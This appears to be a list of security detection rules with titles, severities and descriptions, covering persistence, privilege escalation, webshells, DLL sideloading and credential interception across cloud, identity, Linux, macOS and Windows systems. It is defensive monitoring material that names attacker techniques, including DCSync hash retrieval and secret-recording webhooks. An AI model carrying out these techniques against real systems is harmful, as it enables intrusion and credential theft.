AWS IAM Backdoor Users KeysmediumDetects AWS API key creation for a user by another user. Backdoored users can be used to obtain persistence in the AWS environment. Also with this alert, you can detect a flow of AWS keys in your org.
AWS IAM S3Browser Templated S3 Bucket Policy CreationhighDetects S3 browser utility creating Inline IAM policy containing default S3 bucket name placeholder value of "".
AWS IAM S3Browser LoginProfile CreationhighDetects S3 Browser utility performing reconnaissance looking for existing IAM Users without a LoginProfile defined then (when found) creating a LoginProfile.
AWS IAM S3Browser User or AccessKey CreationhighDetects S3 Browser utility creating IAM User or AccessKey.
AWS Route 53 Domain Transfer Lock DisabledlowDetects when a transfer lock was removed from a Route 53 domain. It is recommended to refrain from performing this action unless intending to transfer the domain to a different registrar.
AWS Route 53 Domain Transferred to Another AccountlowDetects when a request has been made to transfer a Route 53 domain to another AWS account.
AWS Identity Center Identity Provider ChangehighDetects a change in the AWS Identity Center (FKA AWS SSO) identity provider. A change in identity provider allows an attacker to establish persistent access or escalate privileges via user impersonation.
AWS User Login Profile Was ModifiedhighDetects activity when someone is changing passwords on behalf of other users. An attacker with the "iam:UpdateLoginProfile" permission on other users can change the password used to login to the AWS console on any user that already has a login profile setup.
User Added to an Administrator's Azure AD RolemediumUser Added to an Administrator's Azure AD Role
Number Of Resource Creation Or Deployment ActivitiesmediumNumber of VM creations or deployment activities occur in Azure via the azureactivity log.
Granting Of Permissions To An AccountmediumIdentifies IPs from which users grant access to other users on azure resources and alerts when a previously unseen source IP address is used.
Azure Kubernetes Admission ControllermediumIdentifies when an admission controller is executed in Azure Kubernetes. A Kubernetes Admission controller intercepts, and possibly modifies, requests to the Kubernetes API server. The behavior of this admission controller is determined by an admission webhook (MutatingAdmissionWebhook or ValidatingAdmissionWebhook) that the user deploys in the cluster. An adversary can use such webhooks as the MutatingAdmissionWebhook for obtaining persistence in the cluster. For example, attackers can intercept and modify the pod creation operations in the cluster and add their malicious container to every created pod. An adversary can use the webhook ValidatingAdmissionWebhook, which could be used to obtain access credentials. An adversary could use the webhook to intercept the requests to the API server, record secrets, and other sensitive information.
Azure Kubernetes CronJobmediumIdentifies when a Azure Kubernetes CronJob runs in Azure Cloud. Kubernetes Job is a controller that creates one or more pods and ensures that a specified number of them successfully terminate. Kubernetes Job can be used to run containers that perform finite tasks for batch jobs. Kubernetes CronJob is used to schedule Jobs. An Adversary may use Kubernetes CronJob for scheduling execution of malicious code that would run as a container in the cluster.
Disabled MFA to Bypass Authentication MechanismsmediumDetection for when multi factor authentication has been disabled, which might indicate a malicious activity to bypass authentication mechanisms.
CA Policy Removed by Non Approved ActormediumMonitor and alert on conditional access changes where non approved actor removed CA Policy.
CA Policy Updated by Non Approved ActormediumMonitor and alert on conditional access changes. Is Initiated by (actor) approved to make changes? Review Modified Properties and compare "old" vs "new" value.
Certificate-Based Authentication EnabledmediumDetects when certificate based authentication has been enabled in an Azure Active Directory tenant.
New Root Certificate Authority AddedmediumDetects newly added root certificate authority to an AzureAD tenant to support certificate based authentication.
Application AppID Uri Configuration ChangeshighDetects when a configuration change is made to an applications AppID URI.
Added Credentials to Existing ApplicationhighDetects when a new credential is added to an existing application. Any additional credentials added outside of expected processes could be a malicious actor using those credentials.
App Granted Privileged Delegated Or App PermissionshighDetects when administrator grants either application permissions (app roles) or highly privileged delegated permissions
App Assigned To Azure RBAC/Microsoft Entra RolemediumDetects when an app is assigned Azure AD roles, such as global administrator, or Azure RBAC roles, such as subscription owner.
Application URI Configuration ChangeshighDetects when a configuration change is made to an applications URI. URIs for domain names that no longer exist (dangling URIs), not using HTTPS, wildcards at the end of the domain, URIs that are no unique to that app, or URIs that point to domains you do not control should be investigated.
Change to Authentication MethodmediumChange to authentication method could be an indicator of an attacker adding an auth method to the account so they can have continued access.
User Added To Group With CA Policy Modification AccessmediumMonitor and alert on group membership additions of groups that have CA policy modification access
User Removed From Group With CA Policy Modification AccessmediumMonitor and alert on group membership removal of groups that have CA policy modification access
Guest User Invited By Non Approved InvitersmediumDetects when a user that doesn't have permissions to invite a guest user attempts to invite one.
PIM Alert Setting Changes To DisabledhighDetects when PIM alerts are set to disabled.
Changes To PIM SettingshighDetects when changes are made to PIM roles
Bulk Deletion Changes To Privileged Account PermissionshighDetects when a user is removed from a privileged role. Bulk changes should be investigated.
Privileged Account CreationmediumDetects when a new admin is created.
Temporary Access Pass Added To An AccounthighDetects when a temporary access pass (TAP) is added to an account. TAPs added to priv accounts should be investigated
User Risk and MFA Registration Policy UpdatedhighDetects changes and updates to the user risk and MFA registration policy. Attackers can modified the policies to Bypass MFA, weaken security thresholds, facilitate further attacks, maintain persistence.
Multi Factor Authentication Disabled For User AccountmediumDetects changes to the "StrongAuthenticationRequirement" value, where the state is set to "0" or "Disabled". Threat actors were seen disabling multi factor authentication for users in order to maintain or achieve access to the account. Also see in SIM Swap attacks.
Password Reset By User AccountmediumDetect when a user has reset their password in Azure AD
Anomalous User ActivityhighIndicates that there are anomalous patterns of behavior like suspicious changes to the directory.
Activity From Anonymous IP AddresshighIdentifies that users were active from an IP address that has been identified as an anonymous proxy IP address.
Atypical TravelhighIdentifies two sign-ins originating from geographically distant locations, where at least one of the locations may also be atypical for the user, given past behavior.
Impossible TravelhighIdentifies user activities originating from geographically distant locations within a time period shorter than the time it takes to travel from the first location to the second.
Suspicious Browser ActivityhighIndicates anomalous behavior based on suspicious sign-in activity across multiple tenants from different countries in the same browser
Azure AD Threat IntelligencehighIndicates user activity that is unusual for the user or consistent with known attack patterns.
New CountryhighDetects sign-ins from new countries. The detection considers past activity locations to determine new and infrequent locations.
Unfamiliar Sign-In PropertieshighDetects sign-in with properties that are unfamiliar to the user. The detection considers past sign-in history to look for anomalous sign-ins.
Stale Accounts In A Privileged RolehighIdentifies when an account hasn't signed in during the past n number of days.
Invalid PIM LicensehighIdentifies when an organization doesn't have the proper license for PIM and is out of compliance.
Roles Assigned Outside PIMhighIdentifies when a privilege role assignment has taken place outside of PIM and may indicate an attack.
Roles Activation Doesn't Require MFAhighIdentifies when a privilege role can be activated without performing mfa.
Roles Activated Too FrequentlyhighIdentifies when the same privilege role has multiple activations by the same user.
Roles Are Not Being UsedhighIdentifies when a user has been assigned a privilege role and are not using that role.
Too Many Global AdminshighIdentifies an event where there are there are too many accounts assigned the Global Administrator role.
Application Using Device Code Authentication FlowmediumDevice code flow is an OAuth 2.0 protocol flow specifically for input constrained devices and is not used in all environments. If this type of flow is seen in the environment and not being used in an input constrained device scenario, further investigation is warranted. This can be a misconfigured application or potentially something malicious.
Applications That Are Using ROPC Authentication FlowmediumResource owner password credentials (ROPC) should be avoided if at all possible as this requires the user to expose their current password credentials to the application directly. The application then uses those credentials to authenticate the user against the identity provider.
Bitbucket Global Permission ChangedmediumDetects global permissions change activity.
GCP Access Policy DeletedmediumDetects when an access policy that is applied to a GCP cloud resource is deleted. An adversary would be able to remove access policies to gain access to a GCP cloud resource.
Google Cloud Kubernetes Admission ControllermediumIdentifies when an admission controller is executed in GCP Kubernetes. A Kubernetes Admission controller intercepts, and possibly modifies, requests to the Kubernetes API server. The behavior of this admission controller is determined by an admission webhook (MutatingAdmissionWebhook or ValidatingAdmissionWebhook) that the user deploys in the cluster. An adversary can use such webhooks as the MutatingAdmissionWebhook for obtaining persistence in the cluster. For example, attackers can intercept and modify the pod creation operations in the cluster and add their malicious container to every created pod. An adversary can use the webhook ValidatingAdmissionWebhook, which could be used to obtain access credentials. An adversary could use the webhook to intercept the requests to the API server, record secrets, and other sensitive information.
Google Cloud Kubernetes CronJobmediumIdentifies when a Google Cloud Kubernetes CronJob runs in Azure Cloud. Kubernetes Job is a controller that creates one or more pods and ensures that a specified number of them successfully terminate. Kubernetes Job can be used to run containers that perform finite tasks for batch jobs. Kubernetes CronJob is used to schedule Jobs. An Adversary may use Kubernetes CronJob for scheduling execution of malicious code that would run as a container in the cluster.
Google Workspace Application Access Level ModifiedmediumDetects when an access level is changed for a Google workspace application. An access level is part of BeyondCorp Enterprise which is Google Workspace's way of enforcing Zero Trust model. An adversary would be able to remove access levels to gain easier access to Google workspace resources.
Google Workspace Granted Domain API AccessmediumDetects when an API access service account is granted domain authority.
Google Workspace User Granted Admin PrivilegesmediumDetects when an Google Workspace user is granted admin privileges.
Github High Risk Configuration DisabledhighDetects when a user disables a critical security feature for an organization.
Github Fork Private Repositories Setting Enabled/ClearedmediumDetects when the policy allowing forks of private and internal repositories is changed (enabled or cleared).
New Github Organization Member AddedinformationalDetects when a new member is added or invited to a github organization.
Github New Secret CreatedlowDetects when a user creates action secret for the organization, environment, codespaces or repository.
Github Outside Collaborator DetectedmediumDetects when an organization member or an outside collaborator is added to or removed from a project board or has their permission level changed or when an owner removes an outside collaborator from an organization or when two-factor authentication is required in an organization and an outside collaborator does not use 2FA or disables 2FA.
Github Repository/Organization TransferredmediumDetects when a repository or an organization is being transferred to another location.
Github Self Hosted Runner Changes DetectedlowA self-hosted runner is a system that you deploy and manage to execute jobs from GitHub Actions on GitHub.com. This rule detects changes to self-hosted runners configurations in the environment. The self-hosted runner configuration changes once detected, it should be validated from GitHub UI because the log entry may not provide full context.
Github SSH Certificate Configuration ChangedmediumDetects when changes are made to the SSH certificate configuration of the organization.
Disabling Multi Factor AuthenticationhighDetects disabling of Multi Factor Authentication.
New Federated Domain AddedmediumDetects the addition of a new Federated Domain.
New Federated Domain Added - ExchangemediumDetects the addition of a new Federated Domain.
Okta Admin Role Assigned to an User or GroupmediumDetects when an the Administrator role is assigned to an user or group.
Okta Admin Role Assignment CreatedmediumDetects when a new admin role assignment is created. Which could be a sign of privilege escalation or persistence
Okta API Token CreatedmediumDetects when a API token is created
Okta Identity Provider CreatedmediumDetects when a new identity provider is created for Okta.
Okta MFA Reset or DeactivatedmediumDetects when an attempt at deactivating or resetting MFA.
Creation Of An User AccountmediumDetects the creation of a new user account. Such accounts may be used for persistence that do not require persistent remote access tools to be deployed on the system.
Loading of Kernel Module via InsmodhighDetects loading of kernel modules with insmod command. Loadable Kernel Modules (LKMs) are pieces of code that can be loaded and unloaded into the kernel upon demand. Adversaries may use LKMs to obtain persistence within the system or elevate the privileges.
Systemd Service Reload or StartlowDetects a reload or a start of a service.
Systemd Service CreationmediumDetects a creation of systemd services which could be used by adversaries to execute malicious code.
Unix Shell Configuration ModificationmediumDetect unix shell configuration modification. Adversaries may establish persistence through executing malicious commands triggered when a new shell is opened.
Webshell Remote Command ExecutioncriticalDetects possible command execution by web application/web shell
Code Injection by ld.so PreloadhighDetects the ld.so preload persistence file. See `man ld.so` for more information.
Potential Suspicious BPF Activity - LinuxhighDetects the presence of "bpf_probe_write_user" BPF helper-generated warning messages. Which could be a sign of suspicious eBPF activity on the system.
Shellshock ExpressionhighDetects shellshock expressions in log files
Privileged User Has Been CreatedhighDetects the addition of a new user to a privileged group such as "root" or "sudo"
Modifying CrontabmediumDetects suspicious modification of crontab file.
Persistence Via Sudoers FilesmediumDetects creation of sudoers file or files in "sudoers.d" directory which can be used a potential method to persiste privileges for a specific user.
Potentially Suspicious Shell Script Creation in Profile FolderlowDetects the creation of shell scripts under the "profile.d" path.
Persistence Via Cron FilesmediumDetects creation of cron file or files in Cron directories which could indicates potential persistence.
Triple Cross eBPF Rootkit Default PersistencehighDetects the creation of "ebpfbackdoor" files in both "cron.d" and "sudoers.d" directories. Which both are related to the TripleCross persistence method
Potentially Suspicious Malware Callback Communication - LinuxhighDetects programs that connect to known malware callback ports based on threat intelligence reports.
Scheduled Task/Job AtlowDetects the use of at/atd which are utilities that are used to schedule tasks. They are often abused by adversaries to maintain persistence or to perform task scheduling for initial or recurring execution of malicious code
ESXi Account Creation Via ESXCLImediumDetects user account creation on ESXi system via esxcli
Scheduled Cron Task/Job - LinuxmediumDetects abuse of the cron utility to perform task scheduling for initial or recurring execution of malicious code. Detection will focus on crontab jobs uploaded from the tmp folder.
Setuid and SetgidlowDetects suspicious change of file privileges with chown and chmod commands
Potential Linux Amazon SSM Agent HijackingmediumDetects potential Amazon SSM agent hijack attempts as outlined in the Mitiga research report.
User Added To Root/Sudoers Group Using UsermodmediumDetects usage of the "usermod" binary to add users add users to the root or suoders groups
Linux Webshell IndicatorshighDetects suspicious sub processes of web server processes
MacOS Emond Launch DaemonmediumDetects additions to the Emond Launch Daemon that adversaries may use to gain persistence and elevate privileges.
Startup Item File Created - MacOSlowDetects the creation of a startup item plist file, that automatically get executed at boot initialization to establish persistence. Adversaries may use startup items automatically executed at boot initialization to establish persistence. Startup items execute during the final phase of the boot process and contain shell scripts or other executable files along with configuration information used by the system to determine the execution order for all startup items.
Creation Of A Local User AccountlowDetects the creation of a new user account. Such accounts may be used for persistence that do not require persistent remote access tools to be deployed on the system.
Root Account Enable Via DsenablerootmediumDetects attempts to enable the root account via "dsenableroot"
Launch Agent/Daemon Execution Via LaunchctlmediumDetects the execution of programs as Launch Agents or Launch Daemons using launchctl on macOS.
Suspicious Microsoft Office Child Process - MacOShighDetects suspicious child processes spawning from microsoft office suite applications such as word or excel. This could indicates malicious macro execution
Potential Persistence Via PlistBuddyhighDetects potential persistence activity using LaunchAgents or LaunchDaemons via the PlistBuddy utility
Scheduled Cron Task/Job - MacOsmediumDetects abuse of the cron utility to perform task scheduling for initial or recurring execution of malicious code. Detection will focus on crontab jobs uploaded from the tmp folder.
Suspicious Execution via macOS Script EditormediumDetects when the macOS Script Editor utility spawns an unusual child process.
Cisco Local AccountshighFind local accounts being created or modified as well as remote authentication configurations
Cisco Modify ConfigurationmediumModifications to a config that will serve an adversary's impacts or persistence
Cisco BGP Authentication FailureslowDetects BGP failures which may be indicative of brute force attacks to manipulate routing
Cisco LDP Authentication FailureslowDetects LDP failures which may be indicative of brute force attacks to manipulate MPLS labels
Huawei BGP Authentication FailureslowDetects BGP failures which may be indicative of brute force attacks to manipulate routing.
Juniper BGP Missing MD5lowDetects juniper BGP missing MD5 digest. Which may be indicative of brute force attacks to manipulate routing.
MITRE BZAR Indicators for PersistencemediumWindows DCE-RPC functions which indicate a persistence techniques on the remote system. All credit for the Zeek mapping of the suspicious endpoint/operation field goes to MITRE.
Remote Task Creation via ATSVC Named Pipe - ZeekmediumDetects remote task creation via at.exe or API interacting with ATSVC namedpipe
Bitsadmin to Uncommon IP Server AddresshighDetects Bitsadmin connections to IP addresses instead of FQDN names
Bitsadmin to Uncommon TLDhighDetects Bitsadmin connections to domains with uncommon TLDs
Suspicious Windows Strings In URIhighDetects suspicious Windows strings in URI which could indicate possible exfiltration or webshell communication
Webshell ReGeorg Detection Via Web LogshighCertain strings in the uri_query field when combined with null referer and null user agent can indicate activity associated with the webshell ReGeorg.
Windows Webshell StringshighDetects common commands used in Windows webshells
MSSQL Add Account To Sysadmin RolehighDetects when an attacker tries to backdoor the MSSQL server by adding a backdoor account to the sysadmin fixed server role
MSSQL SPProcoption SethighDetects when the a stored procedure is set or cleared for automatic execution in MSSQL. A stored procedure that is set to automatic execution runs every time an instance of SQL Server is started
New BITS Job Created Via BitsadminlowDetects the creation of a new bits job by Bitsadmin
New BITS Job Created Via PowerShelllowDetects the creation of a new bits job by PowerShell
BITS Transfer Job Downloading File Potential Suspicious ExtensionmediumDetects new BITS transfer job saving local files with potential suspicious extensions
BITS Transfer Job Download From File Sharing DomainshighDetects BITS transfer job downloading files from a file sharing domain.
BITS Transfer Job Download From Direct IPhighDetects a BITS transfer job downloading file(s) from a direct IP address.
BITS Transfer Job With Uncommon Or Suspicious Remote TLDmediumDetects a suspicious download using the BITS client from a FQDN that is unusual. Adversaries may abuse BITS jobs to persistently execute or clean up after malicious payloads.
BITS Transfer Job Download To Potential Suspicious FolderhighDetects new BITS transfer job where the LocalName/Saved file is stored in a potentially suspicious location
New Module Module Added To IIS ServermediumDetects the addition of a new module to an IIS server.
Previously Installed IIS Module Was RemovedlowDetects the removal of a previously installed IIS module.
Mailbox Export to Exchange WebservercriticalDetects a successful export of an Exchange mailbox to untypical directory or with aspx name suffix which can be used to place a webshell or the needed role assignment for it
Certificate Request Export to Exchange WebservercriticalDetects a write of an Exchange CSR to an untypical directory or with aspx name suffix which can be used to place a webshell
Exchange Set OabVirtualDirectory ExternalUrl PropertyhighRule to detect an adversary setting OabVirtualDirectory External URL property to a script in Exchange Management log
MSExchange Transport Agent Installation - BuiltinmediumDetects the Installation of a Exchange Transport Agent
Failed MSExchange Transport Agent InstallationhighDetects a failed installation of a Exchange Transport Agent
Powerview Add-DomainObjectAcl DCSync AD Extend RighthighBackdooring domain object to grant the rights associated with DCSync to a regular user or machine account using Powerview\Add-DomainObjectAcl DCSync Extended Right cmdlet, will allow to re-obtain the pwd hashes of any user/computer
Enabled User Right in AD to Control User ObjectshighDetects scenario where if a user is assigned the SeEnableDelegationPrivilege right in Active Directory it would allow control of other AD user objects.
Active Directory User BackdoorshighDetects scenarios where one can control another users or computers account without having to use their credentials.
Remote Task Creation via ATSVC Named PipemediumDetects remote task creation via at.exe or API interacting with ATSVC namedpipe
Persistence and Execution at Scale via GPO Scheduled TaskhighDetect lateral movement using GPO scheduled task, usually used to deploy ransomware at scale
Hidden Local User CreationhighDetects the creation of a local hidden user account which should not happen for event ID 4720.
HybridConnectionManager Service InstallationhighRule to detect the Hybrid Connection Manager service installation.
Windows Network Access Suspicious desktop.ini ActionmediumDetects unusual processes accessing desktop.ini remotely over network share, which can be leveraged to alter how Explorer displays a folder's content (i.e. renaming files) without changing them on disk.
Service Registry Key Read Access RequestlowDetects "read access" requests on the services registry key. Adversaries may execute their own malicious payloads by hijacking the Registry entries used by services. Adversaries may use flaws in the permissions for Registry keys related to services to redirect from the originally specified executable to one that they control, in order to launch their own code when a service starts.
Remote Access Tool Services Have Been Installed - SecuritymediumDetects service installation of different remote access tools software. These software are often abused by threat actors to perform
A New Trust Was Created To A DomainmediumAddition of domains is seldom and should be verified for legitimacy.
Win Susp Computer Name Containing SamtheadmincriticalDetects suspicious computer name samtheadmin-{1..100}$ generated by hacktool
Addition of SID History to Active Directory ObjectmediumAn attacker can use the SID history attribute to gain additional privileges.
Password Change on Directory Service Restore Mode (DSRM) AccounthighDetects potential attempts made to set the Directory Services Restore Mode administrator password. The Directory Service Restore Mode (DSRM) account is a local administrator account on Domain Controllers. Attackers may change the password in order to obtain persistence.
Account Tampering - Suspicious Failed Logon ReasonsmediumThis method uses uncommon error codes on failed logons to determine suspicious activity and tampering with accounts that have been disabled or somehow restricted.
Suspicious Windows ANONYMOUS LOGON Local Account CreatedhighDetects the creation of suspicious accounts similar to ANONYMOUS LOGON, such as using additional spaces. Created as an covering detection for exclusion of Logon Type 3 from ANONYMOUS LOGON accounts.
Suspicious Scheduled Task CreationhighDetects suspicious scheduled task creation events. Based on attributes such as paths, commands line flags, etc.
Important Scheduled Task Deleted/DisabledhighDetects when adversaries stop services or processes by deleting or disabling their respective scheduled tasks in order to conduct data destructive activities
Suspicious Scheduled Task UpdatehighDetects update to a scheduled task event that contain suspicious keywords.
Remote Service Activity via SVCCTL Named PipemediumDetects remote service activity via remote access to the svcctl named pipe
User Added to Local Administrator GroupmediumDetects the addition of a new member to the local administrator group, which could be legitimate activity or a sign of privilege escalation activity
Local User CreationlowDetects local user creation on Windows servers, which shouldn't happen in an Active Directory environment. Apply this Sigma Use Case on your Windows server logs and not on your DC logs.
WMI Persistence - SecuritymediumDetects suspicious WMI event filter and command line event consumer based on WMI and Security Logs.
A Member Was Removed From a Security-Enabled Global GrouplowDetects activity when a member is removed from a security-enabled global group
A Member Was Added to a Security-Enabled Global GrouplowDetects activity when a member is added to a security-enabled global group
A Security-Enabled Global Group Was DeletedlowDetects activity when a security-enabled global group is deleted
Failed Logon From Public IPmediumDetects a failed logon attempt from a public IP. A login from a public IP can indicate a misconfigured firewall or network boundary.
HybridConnectionManager Service RunninghighRule to detect the Hybrid Connection Manager service running on an endpoint.
Moriya Rootkit - SystemcriticalDetects the use of Moriya rootkit as described in the securelist's Operation TunnelSnake report
Anydesk Remote Access Software Service InstallationmediumDetects the installation of the anydesk software service. Which could be an indication of anydesk abuse if you the software isn't already used.
NetSupport Manager Service InstallmediumDetects NetSupport Manager service installation on the target system.
Remote Access Tool Services Have Been Installed - SystemmediumDetects service installation of different remote access tools software. These software are often abused by threat actors to perform
Remote Utilities Host Service InstallmediumDetects Remote Utilities Host service installation on the target system.
Suspicious Service InstallationhighDetects suspicious service installation commands
Uncommon Service Installation Image PathmediumDetects uncommon service installation commands by looking at suspicious or uncommon image path values containing references to encoded powershell commands, temporary paths, etc.
RTCore Suspicious Service InstallationhighDetects the installation of RTCore service. Which could be an indication of Micro-Star MSI Afterburner vulnerable driver abuse
Service Installation in Suspicious FoldermediumDetects service installation in suspicious folder appdata
Service Installation with Suspicious Folder PatternhighDetects service installation with suspicious folder patterns
Suspicious Service Installation ScripthighDetects suspicious service installation scripts
Scheduled Task Executed From A Suspicious LocationmediumDetects the execution of Scheduled Tasks where the Program being run is located in a suspicious location or it's an unusale program to be run from a Scheduled Task
Scheduled Task Executed Uncommon LOLBINmediumDetects the execution of Scheduled Tasks where the program being run is located in a suspicious location or where it is an unusual program to be run from a Scheduled Task
WMI PersistencemediumDetects suspicious WMI event filter and command line event consumer based on WMI and Security Logs.
Potential Suspicious Winget Package InstallationhighDetects potential suspicious winget package installation from a suspicious source.
DNS HybridConnectionManager Service BushighDetects Azure Hybrid Connection Manager services querying the Azure service bus service
Driver Load From A Temporary DirectoryhighDetects a driver load from a temporary directory
Potential PrintNightmare Exploitation AttempthighDetect DLL deletions from Spooler Service driver folder. This might be a potential exploitation attempt of CVE-2021-1675
Creation Of Non-Existent System DLLmediumDetects the creation of system DLLs that are usually not present on the system (or at least not in system directories). Usually this technique is used to achieve DLL hijacking.
New Custom Shim Database CreatedmediumAdversaries may establish persistence and/or elevate privileges by executing malicious content triggered by application shims. The Microsoft Windows Application Compatibility Infrastructure/Framework (Application Shim) was created to allow for backward compatibility of software as the operating system codebase changes over time.
Suspicious Screensaver Binary File CreationmediumAdversaries may establish persistence by executing malicious content triggered by user inactivity. Screensavers are programs that execute after a configurable time of user inactivity and consist of Portable Executable (PE) files with a .scr file extension
Creation Exe for Service with Unquoted PathhighAdversaries may execute their own malicious payloads by hijacking vulnerable file path references. Adversaries can take advantage of paths that lack surrounding quotations by placing an executable in a higher level directory within the path, so that Windows will choose the adversary's executable to launch.
DLL Search Order Hijackig Via Additional Space in PathhighDetects when an attacker create a similar folder structure to windows system folders such as (Windows, Program Files...) but with a space in order to trick DLL load search order and perform a "DLL Search Order Hijacking" attack
Potential Persistence Attempt Via ErrorHandler.CmdmediumDetects creation of a file named "ErrorHandler.cmd" in the "C:\WINDOWS\Setup\Scripts\" directory which could be used as a method of persistence The content of C:\WINDOWS\Setup\Scripts\ErrorHandler.cmd is read whenever some tools under C:\WINDOWS\System32\oobe\ (e.g. Setup.exe) fail to run for any reason.
Suspicious ASPX File Drop by ExchangehighDetects suspicious file type dropped by an Exchange component in IIS into a suspicious folder
Suspicious File Drop by ExchangemediumDetects suspicious file type dropped by an Exchange component in IIS
HackTool - Powerup Write Hijack DLLhighPowerup tool's Write Hijack DLL exploits DLL hijacking for privilege escalation. In it's default mode, it builds a self deleting .bat file which executes malicious command. The detection rule relies on creation of the malicious bat file (debug.bat by default).
Malicious DLL File Dropped in the Teams or OneDrive FolderhighDetects creation of a malicious DLL file in the location where the OneDrive or Team applications Upon execution of the Teams or OneDrive application, the dropped malicious DLL file ("iphlpapi.dll") is sideloaded
File Creation In Suspicious Directory By Msdt.EXEhighDetects msdt.exe creating files in suspicious directories which could be a sign of exploitation of either Follina or Dogwalk vulnerabilities
Potential Persistence Via Notepad++ PluginsmediumDetects creation of new ".dll" files inside the plugins directory of a notepad++ installation by a process other than "gup.exe". Which could indicates possible persistence
Potential Persistence Via Microsoft Office Add-InhighDetects potential persistence activity via startup add-ins that load when Microsoft Office starts (.wll/.xll are simply .dll fit for Word or Excel).
New Outlook Macro CreatedmediumDetects the creation of a macro file for Outlook.
Suspicious Outlook Macro CreatedhighDetects the creation of a macro file for Outlook.
Potential Persistence Via Microsoft Office Startup FolderhighDetects creation of Microsoft Office files inside of one of the default startup folders in order to achieve persistence.
Potential Persistence Via Outlook FormhighDetects the creation of a new Outlook form which can contain malicious code
Potential Binary Or Script Dropper Via PowerShellmediumDetects PowerShell creating a binary executable or a script file.
PowerShell Script Dropped Via PowerShell.EXElowDetects PowerShell creating a PowerShell file (.ps1). While often times this behavior is benign, sometimes it can be a sign of a dropper script trying to achieve persistence.
PowerShell Module File CreatedlowDetects the creation of a new PowerShell module ".psm1", ".psd1", ".dll", ".ps1", etc.
PowerShell Module File Created By Non-PowerShell ProcessmediumDetects the creation of a new PowerShell module ".psm1", ".psd1", ".dll", ".ps1", etc. by a non-PowerShell process
Potential Suspicious PowerShell Module File CreatedmediumDetects the creation of a new PowerShell module in the first folder of the module directory structure "\WindowsPowerShell\Modules\malware\malware.psm1". This is somewhat an uncommon practice as legitimate modules often includes a version folder.
Potential Startup Shortcut Persistence Via PowerShell.EXEhighDetects PowerShell writing startup shortcuts. This procedure was highlighted in Red Canary Intel Insights Oct. 2021, "We frequently observe adversaries using PowerShell to write malicious .lnk files into the startup directory to establish persistence. Accordingly, this detection opportunity is likely to identify persistence mechanisms in multiple threats. In the context of Yellow Cockatoo, this persistence mechanism eventually launches the command-line script that leads to the installation of a malicious DLL"
Potential RipZip Attack on Startup FolderhighDetects a phishing attack which expands a ZIP file containing a malicious shortcut. If the victim expands the ZIP file via the explorer process, then the explorer process expands the malicious ZIP file and drops a malicious shortcut redirected to a backdoor into the Startup folder. Additionally, the file name of the malicious shortcut in Startup folder contains {0AFACED1-E828-11D1-9187-B532F1E9575D} meaning the folder shortcut operation.
Startup Folder File WritemediumA General detection for files being created in the Windows startup directory. This could be an indicator of persistence.
Suspicious desktop.ini ActionmediumDetects unusual processes accessing desktop.ini, which can be leveraged to alter how Explorer displays a folder's content (i.e. renaming files) without changing them on disk.
Suspicious MSExchangeMailboxReplication ASPX WritehighDetects suspicious activity in which the MSExchangeMailboxReplication process writes .asp and .apsx files to disk, which could be a sign of ProxyShell exploitation
Suspicious Get-Variable.exe CreationhighGet-Variable is a valid PowerShell cmdlet WindowsApps is by default in the path where PowerShell is executed. So when the Get-Variable command is issued on PowerShell execution, the system first looks for the Get-Variable executable in the path and executes the malicious binary instead of looking for the PowerShell cmdlet.
PowerShell Profile ModificationmediumDetects the creation or modification of a powershell profile which could indicate suspicious activity as the profile can be used as a mean of persistence
Suspicious File Creation Activity From Fake Recycle.Bin FolderhighDetects file write event from/to a fake recycle bin folder that is often used as a staging directory for malware
Suspicious Startup Folder PersistencehighDetects when a file with a suspicious extension is created in the startup folder
Suspicious Scheduled Task Write to System32 TaskshighDetects the creation of tasks from processes executed from suspicious locations
VsCode Powershell Profile ModificationmediumDetects the creation or modification of a vscode related powershell profile which could indicate suspicious activity as the profile can be used as a mean of persistence
Windows Terminal Profile Settings Modification By Uncommon ProcessmediumDetects the creation or modification of the Windows Terminal Profile settings file "settings.json" by an uncommon process.
Process Explorer Driver Creation By Non-Sysinternals BinaryhighDetects creation of the Process Explorer drivers by processes other than Process Explorer (procexp) itself. Hack tools or malware may use the Process Explorer driver to elevate privileges, drops it to disk for a few moments, runs a service using that driver and removes it afterwards.
Process Monitor Driver Creation By Non-Sysinternals BinarymediumDetects creation of the Process Monitor driver by processes other than Process Monitor (procmon) itself.
PSEXEC Remote Execution File ArtefacthighDetects creation of the PSEXEC key file. Which is created anytime a PsExec command is executed. It gets written to the file system and will be recorded in the USN Journal on the target system
Potential Privilege Escalation Attempt Via .Exe.Local TechniquehighDetects potential privilege escalation attempt via the creation of the "*.Exe.Local" folder inside the "System32" directory in order to sideload "comctl32.dll"
Creation of WerFault.exe/Wer.dll in Unusual FoldermediumDetects the creation of a file named "WerFault.exe" or "wer.dll" in an uncommon folder, which could be a sign of WerFault DLL hijacking.
Potential Webshell Creation On Static WebsitemediumDetects the creation of files with certain extensions on a static web site. This can be indicative of potential uploads of a web shell.
WMI Persistence - Script Event Consumer File WritehighDetects file writes of WMI script event consumer
UEFI Persistence Via Wpbbin - FileCreationhighDetects creation of a file named "wpbbin" in the "%systemroot%\system32\" directory. Which could be indicative of UEFI based persistence method
WMI ActiveScriptEventConsumers Activity Via Scrcons.EXE DLL LoadmediumDetects signs of the WMI script host process "scrcons.exe" loading scripting DLLs which could indicates WMI ActiveScriptEventConsumers EventConsumers activity.
Potential 7za.DLL SideloadinglowDetects potential DLL sideloading of "7za.dll"
Potential Antivirus Software DLL SideloadingmediumDetects potential DLL sideloading of DLLs that are part of antivirus software suchas McAfee, Symantec...etc
Aruba Network Service Potential DLL SideloadinghighDetects potential DLL sideloading activity via the Aruba Networks Virtual Intranet Access "arubanetsvc.exe" process using DLL Search Order Hijacking
Potential CCleanerDU.DLL SideloadingmediumDetects potential DLL sideloading of "CCleanerDU.dll"
Potential CCleanerReactivator.DLL SideloadingmediumDetects potential DLL sideloading of "CCleanerReactivator.dll"
Potential Chrome Frame Helper DLL SideloadingmediumDetects potential DLL sideloading of "chrome_frame_helper.dll"
Potential DLL Sideloading Via ClassicExplorer32.dllmediumDetects potential DLL sideloading using ClassicExplorer32.dll from the Classic Shell software
Potential DLL Sideloading Via comctl32.dllhighDetects potential DLL sideloading using comctl32.dll to obtain system privileges
Potential DLL Sideloading Of DBGCORE.DLLmediumDetects DLL sideloading of "dbgcore.dll"
Potential DLL Sideloading Of DBGHELP.DLLmediumDetects potential DLL sideloading of "dbghelp.dll"
Potential System DLL Sideloading From Non System LocationshighDetects DLL sideloading of DLLs usually located in system locations (System32, SysWOW64, etc.).
Potential DLL Sideloading Of Libcurl.DLL Via GUP.EXEmediumDetects potential DLL sideloading of "libcurl.dll" by the "gup.exe" process from an uncommon location
